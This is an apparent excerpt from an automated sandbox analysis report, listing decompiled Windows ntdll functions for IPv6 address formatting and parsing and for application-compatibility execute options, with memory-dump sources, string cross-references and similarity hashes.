                                                                                                                                                        0x02368905

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        • WindowsExcludedProcs, xrefs: 023687C1
                                                                                                                                                        • Kernel-MUI-Language-SKU, xrefs: 023689FC
                                                                                                                                                        • Kernel-MUI-Language-Allowed, xrefs: 02368827
                                                                                                                                                        • Kernel-MUI-Language-Disallowed, xrefs: 02368914
                                                                                                                                                        • Kernel-MUI-Number-Allowed, xrefs: 023687E6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
                                                                                                                                                        • Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcspbrk
                                                                                                                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                        • API String ID: 402402107-258546922
                                                                                                                                                        • Opcode ID: 7213492224bfe90d8ae8fdf8d4ac94f2ff9720060fe53b668dedf6ff8d0ab58c
                                                                                                                                                        • Instruction ID: d945cfa33a9f2a09666ab84c1a927d03c7758e7137f740071b729b24b8647a52
                                                                                                                                                        • Opcode Fuzzy Hash: 7213492224bfe90d8ae8fdf8d4ac94f2ff9720060fe53b668dedf6ff8d0ab58c
                                                                                                                                                        • Instruction Fuzzy Hash: 26F1B6B2D00209EFDB21DF95C9849EEB7F9FF08304F1484AAE905A7611D735AA45DF50
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 023813CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 38%
                                                                                                                                                        			E023813CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E02377707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x2342926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E02377707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x2349cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E02377707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E02377707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E02377707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E02377707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                                                                                                                        0x023813d5
                                                                                                                                                        0x023813d9
                                                                                                                                                        0x023813dc
                                                                                                                                                        0x023813de
                                                                                                                                                        0x023813e1
                                                                                                                                                        0x023813e8
                                                                                                                                                        0x023813ee
                                                                                                                                                        0x023ae8fd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023ae921
                                                                                                                                                        0x023ae921
                                                                                                                                                        0x023ae928
                                                                                                                                                        0x023ae982
                                                                                                                                                        0x023ae98a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023ae99a
                                                                                                                                                        0x023ae99e
                                                                                                                                                        0x023ae9a3
                                                                                                                                                        0x023ae9a8
                                                                                                                                                        0x023ae9b9
                                                                                                                                                        0x023ae978
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023ae978
                                                                                                                                                        0x023ae98a
                                                                                                                                                        0x023ae92a
                                                                                                                                                        0x023ae931
                                                                                                                                                        0x023ae944
                                                                                                                                                        0x023ae944
                                                                                                                                                        0x023ae950
                                                                                                                                                        0x023ae954
                                                                                                                                                        0x023ae959
                                                                                                                                                        0x023ae95e
                                                                                                                                                        0x023ae963
                                                                                                                                                        0x023ae970
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023ae975
                                                                                                                                                        0x023ae93b
                                                                                                                                                        0x023ae980
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023ae980
                                                                                                                                                        0x023ae942
                                                                                                                                                        0x023ae94b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023ae94b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023ae942
                                                                                                                                                        0x023813f4
                                                                                                                                                        0x023813f4
                                                                                                                                                        0x023813f9
                                                                                                                                                        0x023813fc
                                                                                                                                                        0x023813ff
                                                                                                                                                        0x02381406
                                                                                                                                                        0x023ae9cc
                                                                                                                                                        0x023ae9d2
                                                                                                                                                        0x023ae9d2
                                                                                                                                                        0x023ae9cc
                                                                                                                                                        0x0238140c
                                                                                                                                                        0x02381411
                                                                                                                                                        0x02381431
                                                                                                                                                        0x0238143a
                                                                                                                                                        0x0238143c
                                                                                                                                                        0x0238143f
                                                                                                                                                        0x0238143f
                                                                                                                                                        0x02381442
                                                                                                                                                        0x02381447
                                                                                                                                                        0x023814a8
                                                                                                                                                        0x023814ac
                                                                                                                                                        0x023ae9e2
                                                                                                                                                        0x023ae9e7
                                                                                                                                                        0x023ae9ec
                                                                                                                                                        0x023aea05
                                                                                                                                                        0x023aea05
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02381449
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02381449
                                                                                                                                                        0x0238144c
                                                                                                                                                        0x02381459
                                                                                                                                                        0x02381462
                                                                                                                                                        0x02381469
                                                                                                                                                        0x0238146a
                                                                                                                                                        0x02381470
                                                                                                                                                        0x02381473
                                                                                                                                                        0x02381476
                                                                                                                                                        0x02381476
                                                                                                                                                        0x02381490
                                                                                                                                                        0x02381495
                                                                                                                                                        0x0238138e
                                                                                                                                                        0x02381390
                                                                                                                                                        0x02381397
                                                                                                                                                        0x02381398
                                                                                                                                                        0x02381399
                                                                                                                                                        0x023813a1
                                                                                                                                                        0x023813a4
                                                                                                                                                        0x023813a4
                                                                                                                                                        0x02381498
                                                                                                                                                        0x0238149c
                                                                                                                                                        0x0238149f
                                                                                                                                                        0x023814a2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023814a4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023814a4
                                                                                                                                                        0x02381413
                                                                                                                                                        0x02381415
                                                                                                                                                        0x02381416
                                                                                                                                                        0x02381419
                                                                                                                                                        0x0238141c
                                                                                                                                                        0x02381422
                                                                                                                                                        0x023813b7
                                                                                                                                                        0x023813bc
                                                                                                                                                        0x023813bf
                                                                                                                                                        0x023813bf
                                                                                                                                                        0x023813c2
                                                                                                                                                        0x02381424
                                                                                                                                                        0x02381424
                                                                                                                                                        0x02381424
                                                                                                                                                        0x02381427
                                                                                                                                                        0x0238142b
                                                                                                                                                        0x0238142c
                                                                                                                                                        0x0238142c
                                                                                                                                                        0x0238142c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0238141c
                                                                                                                                                        0x02381411

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
                                                                                                                                                        • Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                                                        • Opcode ID: 48f1501068e18bf004c6b712f7b087622e2760ede910c287143f03def8002359
                                                                                                                                                        • Instruction ID: d2b117bf158b2dc66fef197154c7eef302ba102b03ed4861ba88e7525d171f47
                                                                                                                                                        • Opcode Fuzzy Hash: 48f1501068e18bf004c6b712f7b087622e2760ede910c287143f03def8002359
                                                                                                                                                        • Instruction Fuzzy Hash: E66123B1E00755AADF34EF99C8909BFBBB6EF84300B14C16EE4DA4B640D774A641CB60
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 02377EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 64%
                                                                                                                                                        			E02377EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x2422088; // 0x7777b0d6
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E02377F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E02393F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E0234DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x2424218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E02393F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E02350D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E02393F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E02358375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E02393F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E023BE8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E02393F92();
					_t38 = 1;
					L2:
					return E0234E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                                                                                                                        0x02377f08
                                                                                                                                                        0x02377f0f
                                                                                                                                                        0x02377f12
                                                                                                                                                        0x02377f1b
                                                                                                                                                        0x02377f31
                                                                                                                                                        0x02393ead
                                                                                                                                                        0x02393eb4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02393eba
                                                                                                                                                        0x02393ecd
                                                                                                                                                        0x02393ed2
                                                                                                                                                        0x02393ee1
                                                                                                                                                        0x02393ee7
                                                                                                                                                        0x02393eec
                                                                                                                                                        0x02393f12
                                                                                                                                                        0x02393f18
                                                                                                                                                        0x02393f1a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02393f20
                                                                                                                                                        0x02393f26
                                                                                                                                                        0x02393f28
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02393f2e
                                                                                                                                                        0x02393f30
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02393f3a
                                                                                                                                                        0x02393f3b
                                                                                                                                                        0x02393f53
                                                                                                                                                        0x02393f64
                                                                                                                                                        0x02393f69
                                                                                                                                                        0x02393f6c
                                                                                                                                                        0x02393f6d
                                                                                                                                                        0x02393f6f
                                                                                                                                                        0x0239e304
                                                                                                                                                        0x0239e30f
                                                                                                                                                        0x0239e315
                                                                                                                                                        0x0239e31e
                                                                                                                                                        0x0239e321
                                                                                                                                                        0x0239e327
                                                                                                                                                        0x0239e329
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0239e32f
                                                                                                                                                        0x0239e32f
                                                                                                                                                        0x0239e337
                                                                                                                                                        0x0239e33a
                                                                                                                                                        0x0239e33b
                                                                                                                                                        0x0239e33d
                                                                                                                                                        0x0239e33f
                                                                                                                                                        0x0239e341
                                                                                                                                                        0x0239e341
                                                                                                                                                        0x0239e34e
                                                                                                                                                        0x0239e353
                                                                                                                                                        0x0239e358
                                                                                                                                                        0x0239e35d
                                                                                                                                                        0x0239e35f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0239e365
                                                                                                                                                        0x0239e365
                                                                                                                                                        0x0239e368
                                                                                                                                                        0x0239e36e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0239e374
                                                                                                                                                        0x0239e32f
                                                                                                                                                        0x02393f75
                                                                                                                                                        0x02393f7a
                                                                                                                                                        0x02393f7c
                                                                                                                                                        0x02393f7e
                                                                                                                                                        0x02393f86
                                                                                                                                                        0x02377f39
                                                                                                                                                        0x02377f47
                                                                                                                                                        0x02377f47
                                                                                                                                                        0x02377f37
                                                                                                                                                        0x02377f37
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02393F12
                                                                                                                                                        Strings
                                                                                                                                                        • ExecuteOptions, xrefs: 02393F04
                                                                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 0239E345
                                                                                                                                                        • Execute=1, xrefs: 02393F5E
                                                                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02393F4A
                                                                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0239E2FB
                                                                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02393F75
                                                                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02393EC4
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
                                                                                                                                                        • Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BaseDataModuleQuery
                                                                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                        • API String ID: 3901378454-484625025
                                                                                                                                                        • Opcode ID: 8d1150fd0a9ce858a4efbe532c9a43d9bcb3d3be1b70ba1c5e85004ff3fc1d74
                                                                                                                                                        • Instruction ID: d3367f9caca14bae99c07a0f619f7bfeb413432729cecb2ba45ec6efd8cbcf4f
                                                                                                                                                        • Opcode Fuzzy Hash: 8d1150fd0a9ce858a4efbe532c9a43d9bcb3d3be1b70ba1c5e85004ff3fc1d74
                                                                                                                                                        • Instruction Fuzzy Hash: A341747268031C7AEF309A94DC85FEAB3ADAB19704F0045E9E509A6181EB70AA458F61
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 02380B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E02380B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E02358980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E0234DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E02380CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E02380CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E023806BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E023806BA(_t135, _t178) == 0 || E02380A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E02380CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E02380CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E023806BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E023806BA(_t124, _t142) == 0 || E02380A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                                                                                                                        0x02380b21
                                                                                                                                                        0x02380b24
                                                                                                                                                        0x02380b27
                                                                                                                                                        0x02380b2a
                                                                                                                                                        0x02380b2d
                                                                                                                                                        0x02380b30
                                                                                                                                                        0x02380b33
                                                                                                                                                        0x02380b36
                                                                                                                                                        0x02380b39
                                                                                                                                                        0x02380b3e
                                                                                                                                                        0x02380c65
                                                                                                                                                        0x02380c68
                                                                                                                                                        0x02380c6a
                                                                                                                                                        0x02380c6f
                                                                                                                                                        0x023aeb42
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023aeb48
                                                                                                                                                        0x023aeb48
                                                                                                                                                        0x02380c75
                                                                                                                                                        0x02380c7a
                                                                                                                                                        0x023aeb54
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023aeb5a
                                                                                                                                                        0x02380c80
                                                                                                                                                        0x02380c84
                                                                                                                                                        0x023aeb98
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023aeba6
                                                                                                                                                        0x02380cb8
                                                                                                                                                        0x02380cba
                                                                                                                                                        0x02380cd3
                                                                                                                                                        0x02380cda
                                                                                                                                                        0x02380ce4
                                                                                                                                                        0x02380ce9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02380cec
                                                                                                                                                        0x02380c8c
                                                                                                                                                        0x023aeb63
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023aeb70
                                                                                                                                                        0x023aeb75
                                                                                                                                                        0x023aeb7d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023aeb8c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023aeb8c
                                                                                                                                                        0x02380c96
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02380ca2
                                                                                                                                                        0x02380cac
                                                                                                                                                        0x02380cb4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02380b44
                                                                                                                                                        0x02380b47
                                                                                                                                                        0x02380b49
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02380b4f
                                                                                                                                                        0x02380b50
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02380b56
                                                                                                                                                        0x02380b62
                                                                                                                                                        0x02380b7c
                                                                                                                                                        0x02380bac
                                                                                                                                                        0x02380a0f
                                                                                                                                                        0x023aeaaa
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023aeac4
                                                                                                                                                        0x023aeac4
                                                                                                                                                        0x02380bd0
                                                                                                                                                        0x02380bd0
                                                                                                                                                        0x02380bd4
                                                                                                                                                        0x02380bd9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02380bdb
                                                                                                                                                        0x02380be0
                                                                                                                                                        0x023aeb0e
                                                                                                                                                        0x02380a1a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02380a1a
